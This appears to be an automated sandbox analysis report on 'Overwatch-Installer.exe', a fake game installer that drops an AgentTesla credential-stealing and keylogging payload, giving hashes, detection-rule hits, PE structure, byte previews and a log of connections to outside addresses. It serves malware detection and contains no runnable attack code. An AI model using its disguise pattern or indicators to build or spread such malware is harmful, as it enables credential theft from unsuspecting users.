Preview:	......JFIF.....`.`.....C................(.....1#%.(:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egc...C......./../cB8Bcccccccccccccccccccccccccccccccccccccccccccccccccc..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...ZJ.....;i$@....1...%...}.....R+..iN["...-.t.=.....{..).{7..).eJ..N..Xe..b2..8?.GZ.}..kp..(.QE..Q[......=v.......y...?......_k...v.C......3".........!....&x...9..s.[Q.R...oS..j.RsV.E.WA.QE...R......).vP.6.TT.......&5....;c..M............}......3..>.u.\|.N.....V..Lm.....a.A...V.Ux..hN........J(.....w:.P..l.g......M...o.}....U9r.vQ.J.y.8.+..........o.:...

C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Download File

Process:	C:\Users\user\Desktop\Overwatch-Installer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	741888
Entropy (8bit):	6.82727024120707
Encrypted:	false
SSDEEP:	12288:WVl8cOnLSc1LhiAuwbC7Obj57Ha1HBpuhZ8uW:kVcu4rROKbVHa1HBpI6
MD5:	CA43BDBD4AAC599EDC0E76CCDE512F8A
SHA1:	2F253C8F76A6DBA5AF7DED25A091A4CC2BBF23DB
SHA-256:	27E46901A6243F1D9C62E2571078B0E4818DE98CE600D46BBB1EF32591F48219
SHA-512:	5EDB2F44AC02EA95E0359BD5112760DE0C63FD3465467F7DA8DB2E26588F9E1BDFC2376C6CB6E9C5D55F35EB4BD8529DCDAFD5E46FD33773283BB7D9673DA1D2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................\|......>.... ........@.. ..............................p=....@.....................................K........y........................................................................... ............... ..H............text...D.... ...................... ..`.rsrc....y.......z..................@..@.reloc...............P..............@..B................ .......H...........\............k...y...........................................0...........r...p.rk..p.r...p... ......r...p..(......o......(.....o.......(...........s...........[o......s.........o...........o........s...........s.........i...............io........o.......o.....(.........o..........+......2%(......(........v.(.......2%(......(..........v.(.......2%(......(...........s.........s.........s.........s............2%(......(.........0..!.......~....o....*...2%(...

C:\Users\user\AppData\Roaming\nefgd\nefgd.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Overwatch-Installer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.82727024120707
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Overwatch-Installer.exe
File size:	741'888 bytes
MD5:	ca43bdbd4aac599edc0e76ccde512f8a
SHA1:	2f253c8f76a6dba5af7ded25a091a4cc2bbf23db
SHA256:	27e46901a6243f1d9c62e2571078b0e4818de98ce600d46bbb1ef32591f48219
SHA512:	5edb2f44ac02ea95e0359bd5112760de0c63fd3465467f7da8db2e26588f9e1bdfc2376c6cb6e9c5d55f35eb4bd8529dcdafd5e46fd33773283bb7d9673da1d2
SSDEEP:	12288:WVl8cOnLSc1LhiAuwbC7Obj57Ha1HBpuhZ8uW:kVcu4rROKbVHa1HBpI6
TLSH:	13F4BE0A73A1970AF57E1F7644B697066370F8521A23CB0FABC619B99E232C08D177D7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................\|......>.... ........@.. ..............................p=....@................................

File Icon


Icon Hash:	3369ecccdc713117

Static PE Info

General

Entrypoint:	0x42f23e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66D4C10D [Sun Sep 1 19:31:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f1f0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x30000	0x879dc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2d244	0x2d400	47b2b5d2e0cddeefda0ed29d985c89be	False	0.3804655127762431	data	5.539275459421436	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x30000	0x879dc	0x87a00	39249ecb4860b82e1d4bd5031e21ca3c	False	0.6859969038018433	data	7.124594769135196	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb8000	0xc	0x200	e2e07d9ad253287d70cb073e1d068bb7	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
FONT	0x3126c	0x13e0c	TrueType Font data, 18 tables, 1st "FFTM", 30 names, Macintosh			0.46435765168263327
FONT	0x45078	0x13fe8	TrueType Font data, 18 tables, 1st "FFTM", 30 names, Macintosh			0.4684722086548794
FONT	0x59060	0x171a8	TrueType Font data, 18 tables, 1st "FFTM", 32 names, Macintosh			0.4292733958914532
JSON	0x70208	0x3cd	JSON data			0.3987667009249743
JSON	0x705d8	0x7fe	JSON data			0.31573802541544477
JSON	0x70dd8	0x7d2	JSON data			0.3091908091908092
JSON	0x715ac	0x73d	JSON data			0.3135456017269293
JSON	0x71cec	0xd7b	JSON data			0.275282526803825
JSON	0x72a68	0x1a7	JSON data			0.5059101654846335
PNG	0x72c10	0x94c	PNG image data, 428 x 343, 8-bit colormap, non-interlaced			0.9857142857142858
PNG	0x7355c	0x5e9	PNG image data, 408 x 108, 8-bit colormap, non-interlaced			1.004626569729015
PNG	0x73b48	0x174	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced			1.0295698924731183
PNG	0x73cbc	0x154	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced			1.011764705882353
PNG	0x73e10	0xf2	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced			1.0082644628099173
PNG	0x73f04	0x13f	PNG image data, 165 x 36, 8-bit/color RGBA, non-interlaced			0.8495297805642633
PNG	0x74044	0x165	PNG image data, 165 x 36, 8-bit/color RGBA, non-interlaced			0.834733893557423
PNG	0x741ac	0x165	PNG image data, 165 x 36, 8-bit/color RGBA, non-interlaced			0.834733893557423
PNG	0x74314	0x136	PNG image data, 165 x 36, 8-bit/color RGBA, non-interlaced			0.8451612903225807
PNG	0x7444c	0x170	PNG image data, 165 x 36, 8-bit/color RGBA, non-interlaced			0.8396739130434783
PNG	0x745bc	0x119	PNG image data, 92 x 36, 8-bit/color RGBA, non-interlaced			0.8718861209964412
PNG	0x746d8	0x149	PNG image data, 92 x 36, 8-bit/color RGBA, non-interlaced			0.9300911854103343
PNG	0x74824	0x149	PNG image data, 92 x 36, 8-bit/color RGBA, non-interlaced			0.9300911854103343
PNG	0x74970	0x11d	PNG image data, 92 x 36, 8-bit/color RGBA, non-interlaced			0.8736842105263158
PNG	0x74a90	0x14f	PNG image data, 92 x 36, 8-bit/color RGBA, non-interlaced			0.9253731343283582
PNG	0x74be0	0xb3	PNG image data, 21 x 19, 8-bit/color RGBA, non-interlaced			0.994413407821229
PNG	0x74c94	0xd2	PNG image data, 21 x 19, 8-bit/color RGBA, non-interlaced			1.0095238095238095
PNG	0x74d68	0x90	PNG image data, 21 x 19, 8-bit/color RGBA, non-interlaced			0.9722222222222222
PNG	0x74df8	0x93	PNG image data, 21 x 19, 8-bit/color RGBA, non-interlaced			0.9931972789115646
PNG	0x74e8c	0x11c	PNG image data, 11 x 11, 8-bit/color RGBA, non-interlaced			1.017605633802817
PNG	0x74fa8	0xd0	PNG image data, 11 x 10, 8-bit/color RGBA, non-interlaced			0.9903846153846154
PNG	0x75078	0xe5d	PNG image data, 738 x 468, 8-bit colormap, non-interlaced			0.9804188196899647
PNG	0x75ed8	0xa392	PNG image data, 220 x 449, 8-bit colormap, non-interlaced			1.0005015045135406
PNG	0x8026c	0xa2dd	PNG image data, 220 x 449, 8-bit colormap, non-interlaced			1.0005036816731825
PNG	0x8a54c	0xa392	PNG image data, 220 x 449, 8-bit colormap, non-interlaced			1.0005015045135406
PNG	0x948e0	0x188	PNG image data, 451 x 22, 8-bit/color RGBA, non-interlaced			0.9897959183673469
PNG	0x94a68	0x1ca	PNG image data, 451 x 22, 8-bit/color RGBA, non-interlaced			1.0065502183406114
PNG	0x94c34	0x377	PNG image data, 60 x 28, 8-bit/color RGBA, non-interlaced			1.012401352874859
PNG	0x94fac	0x188	PNG image data, 362 x 22, 8-bit/color RGBA, non-interlaced			1.0025510204081634
PNG	0x95134	0x1c6	PNG image data, 362 x 22, 8-bit/color RGBA, non-interlaced			0.9889867841409692
PNG	0x952fc	0x27b	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced			1.0173228346456693
PNG	0x95578	0x27e	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced			1.0172413793103448
PNG	0x957f8	0x356	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced			1.0128805620608898
STRINGS	0x95b50	0x47f9	data			0.43001356852103123
RT_ICON	0x9a34c	0x19319	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.9999418565212757
RT_ICON	0xb3668	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 18432			0.5262448132780083
RT_ICON	0xb5c10	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 8192			0.6113977485928705
RT_ICON	0xb6cb8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 2048			0.7650709219858156
RT_GROUP_ICON	0xb7120	0x3e	Targa image data - Map 32 x 37657 x 1 +1			0.8225806451612904
RT_VERSION	0xb7160	0x32c	data			0.4396551724137931
RT_MANIFEST	0xb748c	0x550	ASCII text, with CRLF line terminators	English	United States	0.42573529411764705

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 22:02:58.286200047 CEST	49704	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:02:58.291073084 CEST	80	49704	193.122.6.168	192.168.2.5
Sep 1, 2024 22:02:58.294209003 CEST	49704	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:02:58.294209003 CEST	49704	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:02:58.299153090 CEST	80	49704	193.122.6.168	192.168.2.5
Sep 1, 2024 22:02:59.251622915 CEST	80	49704	193.122.6.168	192.168.2.5
Sep 1, 2024 22:02:59.300760031 CEST	49704	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:14.580009937 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:14.580046892 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:14.580137968 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:14.589967012 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:14.589978933 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.073327065 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.073395014 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.081497908 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.081507921 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.081845045 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.128962994 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.208262920 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.248506069 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.307085037 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.308698893 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.308706999 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.428709984 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.428786039 CEST	443	49705	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.428858995 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.431015015 CEST	49705	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.434451103 CEST	49707	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.434484005 CEST	443	49707	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:15.434560061 CEST	49707	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.434914112 CEST	49707	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:15.434926033 CEST	443	49707	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:16.901575089 CEST	443	49707	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:16.904761076 CEST	49707	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:16.904787064 CEST	443	49707	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:17.041126013 CEST	443	49707	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:17.041359901 CEST	49707	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:17.041369915 CEST	443	49707	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:17.192540884 CEST	443	49707	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:17.192589998 CEST	443	49707	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:17.192636967 CEST	49707	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:17.199630022 CEST	49707	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:17.342338085 CEST	49710	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:17.342367887 CEST	443	49710	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:17.342717886 CEST	49710	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:17.342902899 CEST	49710	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:17.342915058 CEST	443	49710	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:17.900235891 CEST	443	49710	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:17.903780937 CEST	49710	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:17.903800964 CEST	443	49710	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.037347078 CEST	443	49710	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.038163900 CEST	49710	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:18.038173914 CEST	443	49710	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.181014061 CEST	443	49710	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.181071043 CEST	443	49710	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.181816101 CEST	49710	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:18.181827068 CEST	443	49710	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.181859016 CEST	49710	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:18.181932926 CEST	49710	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:18.352157116 CEST	49713	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:18.352190971 CEST	443	49713	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.352262020 CEST	49713	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:18.352525949 CEST	49713	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:18.352536917 CEST	443	49713	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.838721991 CEST	443	49713	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.845554113 CEST	49713	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:18.845573902 CEST	443	49713	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.958703995 CEST	443	49713	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:18.962543011 CEST	49713	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:18.962554932 CEST	443	49713	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:19.106082916 CEST	443	49713	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:19.106148958 CEST	443	49713	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:19.106240988 CEST	49713	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:19.138493061 CEST	49713	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:26.994533062 CEST	49715	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:26.999442101 CEST	80	49715	193.122.6.168	192.168.2.5
Sep 1, 2024 22:03:27.001462936 CEST	49715	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:27.001632929 CEST	49715	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:27.006866932 CEST	80	49715	193.122.6.168	192.168.2.5
Sep 1, 2024 22:03:27.592963934 CEST	80	49715	193.122.6.168	192.168.2.5
Sep 1, 2024 22:03:27.644988060 CEST	49715	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:35.189568996 CEST	49716	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:35.195300102 CEST	80	49716	193.122.6.168	192.168.2.5
Sep 1, 2024 22:03:35.198218107 CEST	49716	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:35.198405027 CEST	49716	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:35.204569101 CEST	80	49716	193.122.6.168	192.168.2.5
Sep 1, 2024 22:03:35.816576004 CEST	80	49716	193.122.6.168	192.168.2.5
Sep 1, 2024 22:03:35.863462925 CEST	49716	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:39.396336079 CEST	49704	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:39.401618958 CEST	80	49704	193.122.6.168	192.168.2.5
Sep 1, 2024 22:03:39.401684999 CEST	49704	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:42.858100891 CEST	49717	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:42.858149052 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:42.858247042 CEST	49717	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:42.861623049 CEST	49717	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:42.861634016 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.075959921 CEST	49716	80	192.168.2.5	193.122.6.168
Sep 1, 2024 22:03:43.310301065 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.310374022 CEST	49717	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:43.314052105 CEST	49717	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:43.314059019 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.314321041 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.361800909 CEST	49717	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:43.404505014 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.453598976 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.453994036 CEST	49717	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:43.454000950 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.583479881 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.583739996 CEST	443	49717	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.583843946 CEST	49717	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:43.583939075 CEST	49717	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:43.585294008 CEST	49718	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:43.585316896 CEST	443	49718	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:43.585480928 CEST	49718	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:43.585741043 CEST	49718	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:43.585760117 CEST	443	49718	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:44.063344002 CEST	443	49718	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:44.064971924 CEST	49718	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:44.064996004 CEST	443	49718	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:44.296602011 CEST	443	49718	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:44.297004938 CEST	49718	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:44.297020912 CEST	443	49718	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:44.645112991 CEST	443	49718	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:44.645195007 CEST	443	49718	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:44.645288944 CEST	49718	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:44.658118010 CEST	49718	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:44.700730085 CEST	49719	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:44.700767994 CEST	443	49719	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:44.700834036 CEST	49719	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:44.702903986 CEST	49719	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:44.702917099 CEST	443	49719	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:45.169192076 CEST	443	49719	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:45.238620996 CEST	49719	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:45.356509924 CEST	49719	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:45.356524944 CEST	443	49719	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:45.456212044 CEST	443	49719	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:45.456506968 CEST	49719	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:45.456521988 CEST	443	49719	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:45.582847118 CEST	443	49719	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:45.582927942 CEST	443	49719	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:45.583003044 CEST	49719	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:45.583885908 CEST	49719	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:45.715795040 CEST	49720	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:45.715830088 CEST	443	49720	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:45.715914011 CEST	49720	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:45.716151953 CEST	49720	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:45.716165066 CEST	443	49720	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:46.154700994 CEST	443	49720	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:46.156519890 CEST	49720	443	192.168.2.5	198.185.159.177
Sep 1, 2024 22:03:46.156538010 CEST	443	49720	198.185.159.177	192.168.2.5
Sep 1, 2024 22:03:46.266217947 CEST	443	49720	198.185.159.177	192.168.2.5
